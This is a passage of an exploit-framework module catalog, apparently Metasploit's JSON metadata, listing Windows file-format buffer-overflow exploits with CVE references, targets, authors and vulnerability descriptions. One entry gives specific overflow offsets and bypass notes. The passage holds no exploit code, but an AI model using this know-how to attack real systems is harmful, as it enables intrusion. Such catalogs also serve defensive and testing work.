"description": "This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.",
"references": [
"BID-40631",
"EDB-13761",
"OSVDB-65256",
"CVE-2010-2343",
"URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows 7 SP1 (DEP Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/easycdda_pls_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/easycdda_pls_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/emc_appextender_keyworks": {
"name": "EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/emc_appextender_keyworks",
"rank": 200,
"disclosure_date": "2009-09-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's\n Documentation ApplicationXtender 5.4.",
"references": [
"CVE-2012-2515",
"OSVDB-58423",
"BID-36546"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/emc_appextender_keyworks",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/erdas_er_viewer_bof": {
"name": "ERS Viewer 2011 ERS File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/erdas_er_viewer_bof",
"rank": 300,
"disclosure_date": "2013-04-23",
"type": "exploit",
"author": [
"Parvez Anwar",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2011\n (version 11.04). The vulnerability exists in the module ermapper_u.dll where the\n function ERM_convert_to_correct_webpath handles user provided data in an insecure\n way. It results in arbitrary code execution under the context of the user viewing\n a specially crafted .ers file. This module has been tested successfully with ERS\n Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-0726",
"OSVDB-92694",
"BID-59379",
"URL-http://secunia.com/advisories/51725/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/erdas_er_viewer_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/erdas_er_viewer_rf_report_error": {
"name": "ERS Viewer 2013 ERS File Handling Buffer Overflow",
"full_name": "exploit/windows/fileformat/erdas_er_viewer_rf_report_error",
"rank": 300,
"disclosure_date": "2013-05-23",
"type": "exploit",
"author": [
"James Fitts",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.\n The vulnerability exists in the module ermapper_u.dll, where the function\n rf_report_error handles user provided data in an insecure way. It results in\n arbitrary code execution under the context of the user viewing a specially crafted\n .ers file. This module has been tested successfully with ERS Viewer 2013 (version\n 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-3482",
"OSVDB-93650",
"URL-http://secunia.com/advisories/53620/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR",
"ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/esignal_styletemplate_bof": {
"name": "eSignal and eSignal Pro File Parsing Buffer Overflow in QUO",
"full_name": "exploit/windows/fileformat/esignal_styletemplate_bof",
"rank": 300,
"disclosure_date": "2011-09-06",
"type": "exploit",
"author": [
"Luigi Auriemma",
"TecR0c <tecr0c@tecninja.net>",
"mr_me <steventhomasseeley@gmai.com>"
],
"description": "The software is unable to handle the \"<StyleTemplate>\" files (even those\n originally included in the program) like those with the registered\n extensions QUO, SUM and POR. Successful exploitation of this\n vulnerability may take up to several seconds due to the use of\n egghunter. Also, DEP bypass is unlikely due to the limited space for\n payload. This vulnerability affects versions 10.6.2425.1208 and earlier.",
"references": [
"CVE-2011-3494",
"OSVDB-75456",
"BID-49600",
"URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt",
"EDB-17837"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win XP SP3 / Windows Vista / Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/esignal_styletemplate_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/etrust_pestscan": {
"name": "CA eTrust PestPatrol ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/etrust_pestscan",
"rank": 200,
"disclosure_date": "2009-11-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-4225",
"OSVDB-60862"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/etrust_pestscan.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/etrust_pestscan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ezip_wizard_bof": {
"name": "eZip Wizard 3.0 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/ezip_wizard_bof",
"rank": 400,
"disclosure_date": "2009-03-09",
"type": "exploit",
"author": [
"fl0 fl0w",
"jduck <jduck@metasploit.com>",
"Lincoln"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 3.0 of ediSys Corp.'s eZip Wizard.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with eZip Wizard, and access the specially crafted\n file via double-clicking it. By doing so, an attacker can execute arbitrary\n code as the victim user.",
"references": [
"CVE-2009-1028",
"OSVDB-52815",
"BID-34044",
"URL-http://www.edisys.com/",
"EDB-8180",
"EDB-12059"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ezip_wizard_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ezip_wizard_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/fatplayer_wav": {
"name": "Fat Player Media Player 0.6b0 Buffer Overflow",
"full_name": "exploit/windows/fileformat/fatplayer_wav",
"rank": 300,
"disclosure_date": "2010-10-18",
"type": "exploit",
"author": [
"James Fitts <fitts.james@gmail.com>",
"dookie"
],
"description": "This module exploits a buffer overflow in Fat Player 0.6b. When\n the application is used to import a specially crafted wav file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"CVE-2009-4962",
"OSVDB-57343",
"EDB-15279"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/fatplayer_wav",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/fdm_torrent": {
"name": "Free Download Manager Torrent Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/fdm_torrent",
"rank": 400,
"disclosure_date": "2009-02-02",
"type": "exploit",
"author": [
"SkD <skdrat@hotmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Free Download Manager\n 3.0 Build 844. Arbitrary code execution could occur when parsing a\n specially crafted torrent file.",
"references": [
"CVE-2009-0184",
"OSVDB-54033",
"BID-33555",
"URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18",
"URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18",
"URL-http://secunia.com/secunia_research/2009-5/",
"URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Free Download Manager 3.0 (Build 844)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/fdm_torrent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/feeddemon_opml": {
"name": "FeedDemon Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/feeddemon_opml",
"rank": 500,
"disclosure_date": "2009-02-09",
"type": "exploit",
"author": [
"fl0 fl0w",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n is used to import a specially crafted opml file, a buffer overflow occurs allowing\n arbitrary code execution.\n\n All versions are suspected to be vulnerable. This vulnerability was originally reported\n against version 2.7 in February of 2009.",
"references": [
"CVE-2009-0546",
"OSVDB-51753",
"BID-33630",
"EDB-7995",
"EDB-8010",
"EDB-11379"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/feeddemon_opml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_reader_filewrite": {
"name": "Foxit PDF Reader 4.2 Javascript File Write",
"full_name": "exploit/windows/fileformat/foxit_reader_filewrite",
"rank": 300,
"disclosure_date": "2011-03-05",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Chris Evans"
],
"description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which requires\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. Kind of lame but that's how it goes sometimes in\n the world of file write bugs.",
"references": [
"OSVDB-71104",
"URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
"Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_filewrite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_reader_launch": {
"name": "Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",
"full_name": "exploit/windows/fileformat/foxit_reader_launch",
"rank": 400,
"disclosure_date": "2009-03-09",
"type": "exploit",
"author": [
"Francisco Falcon",
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.\n Due to the way Foxit Reader handles the input from a \"Launch\" action, it is possible\n to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code\n execution under the context of the user.",
"references": [
"CVE-2009-0837",
"OSVDB-55614",
"BID-34035",
"URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Foxit Reader 3.0 Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_launch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_reader_uaf": {
"name": "Foxit PDF Reader Pointer Overwrite UAF",
"full_name": "exploit/windows/fileformat/foxit_reader_uaf",
"rank": 300,
"disclosure_date": "2018-04-20",
"type": "exploit",
"author": [
"mr_me",
"bit from meepwn",
"saelo",
"Jacob Robles"
],
"description": "Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability\n in the Text Annotations component and the TypedArray's use of\n uninitialized pointers.\n\n The vulnerabilities can be combined to leak a vtable memory address,\n which can be adjusted to point to the base address of the executable.\n A ROP chain can be constructed that will execute when Foxit Reader\n performs the UAF.\n\n This module has been tested on Windows 7 x64, Windows 10 Pro x64\n Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise\n must have insecure logons enabled for the exploit to work as expected.",
"references": [
"CVE-2018-9948",
"CVE-2018-9958",
"ZDI-18-332",
"ZDI-18-342",
"URL-https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html",
"URL-https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 10 Pro x64 Build 17134"
],
"mod_time": "2018-09-05 21:47:57 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_uaf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_title_bof": {
"name": "Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/foxit_title_bof",
"rank": 500,
"disclosure_date": "2010-11-13",
"type": "exploit",
"author": [
"dookie",
"Sud0",
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.",
"references": [
"OSVDB-68648",
"EDB-15532",
"URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Foxit Reader v4.1.1 XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_title_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/free_mp3_ripper_wav": {
"name": "Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/free_mp3_ripper_wav",
"rank": 500,
"disclosure_date": "2011-08-27",
"type": "exploit",
"author": [
"Richard Leahy",
"X-h4ck",
"Tiago Henriques",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found in Free MP3 CD\n Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious\n WAV file.",
"references": [
"CVE-2011-5165",
"OSVDB-63349",
"EDB-11975",
"EDB-17727"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 EN"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/free_mp3_ripper_wav",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/galan_fileformat_bof": {
"name": "gAlan 0.2.1 Buffer Overflow",
"full_name": "exploit/windows/fileformat/galan_fileformat_bof",
"rank": 300,
"disclosure_date": "2009-12-07",
"type": "exploit",
"author": [
"Jeremy Brown <0xjbrown41@gmail.com>",
"loneferret"
],
"description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.",
"references": [
"OSVDB-60897",
"EDB-10339"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/galan_fileformat_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/gsm_sim": {
"name": "GSM SIM Editor 5.15 Buffer Overflow",
"full_name": "exploit/windows/fileformat/gsm_sim",
"rank": 300,
"disclosure_date": "2010-07-07",
"type": "exploit",
"author": [
"Ruben Alejandro",
"chap0 <contact.chap0@gmail.com>",
"Lincoln <lincoln@corelan.be>"
],
"description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.",
"references": [
"CVE-2015-1171",
"OSVDB-81161",
"EDB-14258"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/fileformat/gsm_sim.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/gsm_sim",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/gta_samp": {
"name": "GTA SA-MP server.cfg Buffer Overflow",
"full_name": "exploit/windows/fileformat/gta_samp",
"rank": 300,
"disclosure_date": "2011-09-18",
"type": "exploit",
"author": [
"Silent_Dream"
],
"description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.",
"references": [
"OSVDB-83433",
"EDB-17893"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"GTA SA-MP (samp-server) v0.3.1.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/gta_samp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/gta_samp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/hhw_hhp_compiledfile_bof": {
"name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/hhw_hhp_compiledfile_bof",
"rank": 400,
"disclosure_date": "2006-02-06",
"type": "exploit",
"author": [
"bratax",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74.\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2006-0564",
"OSVDB-22941",
"EDB-1488",
"EDB-1490"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP English SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/hhw_hhp_contentfile_bof": {
"name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/hhw_hhp_contentfile_bof",
"rank": 400,
"disclosure_date": "2006-02-06",
"type": "exploit",
"author": [
"bratax",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.",
"references": [
"CVE-2006-0564",
"OSVDB-22941",
"EDB-1470",
"EDB-1495"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP English SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/hhw_hhp_contentfile_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/hhw_hhp_indexfile_bof": {
"name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/hhw_hhp_indexfile_bof",
"rank": 400,
"disclosure_date": "2009-01-17",
"type": "exploit",
"author": [
"Encrypt3d.M!nd",
"loneferret",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.",
"references": [
"CVE-2009-0133",
"BID-33189",
"OSVDB-22941",
"EDB-10323",
"EDB-10335"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP English SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/hhw_hhp_indexfile_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/homm3_h3m": {
"name": "Heroes of Might and Magic III .h3m Map file Buffer Overflow",
"full_name": "exploit/windows/fileformat/homm3_h3m",
"rank": 300,
"disclosure_date": "2015-07-29",
"type": "exploit",
"author": [
"Pierre Lindblad",
"John AAkerblom"
],
"description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.",
"references": [
"EDB-37716"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]",
"HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
"Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/homm3_h3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ht_mp3player_ht3_bof": {
"name": "HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/ht_mp3player_ht3_bof",
"rank": 400,
"disclosure_date": "2009-06-29",
"type": "exploit",
"author": [
"hack4love <hack4love@hotmail.com>",
"His0k4",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HT-MP3Player 1.0.\n Arbitrary code execution could occur when parsing a specially crafted\n .HT3 file.\n\n NOTE: The player installation does not register the file type to be\n handled. Therefore, a user must take extra steps to load this file.",
"references": [
"CVE-2009-2485",
"OSVDB-55449",
"EDB-9034",
"EDB-9038"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HT-MP3Player 1.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ht_mp3player_ht3_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ibm_forms_viewer_fontname": {
"name": "IBM Forms Viewer Unicode Buffer Overflow",
"full_name": "exploit/windows/fileformat/ibm_forms_viewer_fontname",
"rank": 300,
"disclosure_date": "2013-12-05",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability\n is due to a dangerous usage of a strcpy-like function, and occurs while parsing malformed\n XFDL files containing a long fontname value. This module has been tested successfully on IBM\n Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-5447",
"OSVDB-100732",
"ZDI-13-274",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21657500"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ibm_forms_viewer_fontname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ibm_pcm_ws": {
"name": "IBM Personal Communications iSeries Access WorkStation 5.9 Profile",
"full_name": "exploit/windows/fileformat/ibm_pcm_ws",
"rank": 500,
"disclosure_date": "2012-02-28",
"type": "exploit",
"author": [
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "The IBM Personal Communications I-Series application WorkStation is susceptible to a\n stack-based buffer overflow vulnerability within file parsing in which data copied to a\n location in memory exceeds the size of the reserved destination area. The buffer is located\n on the runtime program stack.\n\n When the WorkStation file is opened it will reach the code path at 0x67575180 located in\n pcspref.dll which conducts string manipulation and validation on the data supplied in the\n WorkStation file. The application will first check if the 'Profile' header exists and appends\n a dot with the next parameter within the file. It will then measure the character length\n of the header by calling strcspn with a dot as its null-terminated character.\n\n It will then write the header into memory and ensure the header ends with a NUL character.\n The parameter character array is passed to the strcpy() function. The application has\n declared a 52-element character array as the destination for the strcpy function. The\n function does not perform bounds checking; therefore, data can be written past the end of\n the buffer variable, resulting in corruption of adjacent variables including other local\n variables, program state information and function arguments. You will notice that the\n saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.\n\n To ensure we can perform arbitrary code execution we must provide a valid pointer at\n 0x74 which is used as an argument for the called function at 0x675751ED as an id file\n extension parameter. Once the caller regains control we will reach our RETURN. The Ret\n instruction will be used to pop the overwritten saved return address which was corrupted.\n\n This exploit has been written to bypass 2 mitigations, DEP and ASLR, on a Windows platform.\n\n Versions tested:\n IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a\n Which bundles pcsws.exe version 5090.27271.709\n\n Tested on:\n Microsoft Windows XP [Version 5.1.2600]\n Microsoft Windows Vista [Version 6.0.6002]\n Microsoft Windows 7 [Version 6.1.7600]",
"references": [
"CVE-2012-0201",
"OSVDB-79657",
"URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM WorkStation 5.9 (Windows XP SP3)",
"IBM WorkStation 5.9 (Windows 7, Windows Vista)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ibm_pcm_ws.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ibm_pcm_ws",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/icofx_bof": {
"name": "IcoFX Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/icofx_bof",
"rank": 300,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"Marcos Accossatto",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of IcoFX. The vulnerability exists while parsing .ICO files, where a specially\n crafted ICONDIR header providing an arbitrary long number of images in the file\n can be used to trigger the overflow when reading the ICONDIRENTRY structures.",
"references": [
"CVE-2013-4988",
"OSVDB-100826",
"BID-64221",
"EDB-30208",
"URL-http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IcoFX 2.5 / Windows 7 SP1"
],
